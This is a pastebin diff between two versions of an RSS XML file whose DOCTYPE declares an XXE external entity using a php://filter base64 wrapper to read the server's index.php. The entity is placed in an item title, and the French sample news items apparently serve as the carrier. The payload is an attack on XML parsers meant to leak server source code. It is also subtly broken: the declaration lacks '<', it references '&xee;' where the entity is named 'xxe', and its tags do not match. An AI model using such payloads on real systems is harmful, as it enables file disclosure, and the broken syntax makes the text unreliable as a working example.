View difference between Paste ID: ecE1qZJx and KwMMwpDV
SHOW: | | - or go back to the newest paste.
1
<?xml version="1.0" encoding="UTF-8"?>
2-
<!DOCTYPE channel [!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
2+
<!DOCTYPE channel [!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"]>
3-
]>
3+
4
    <channel>
5
        <title>Mon site</title>
6
        <description>lol</description>
7
        <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
8
        <link>http://www.example.org</link>
9
        <item>
10
            <title>&xee;</title>
11
            <description>Ceci est ma première actualité</description>
12
            <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
13
            <link>http://www.example.org/actu1</link>
14
        </item>
15
        <item>
16
            <title>Actualité N°2</title>
17
            <description>Ceci est ma seconde actualité</description>
18
            <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
19
            <link>http://www.example.org/actu2</link>
20
        </item>
21
    </channel>
22
</rss>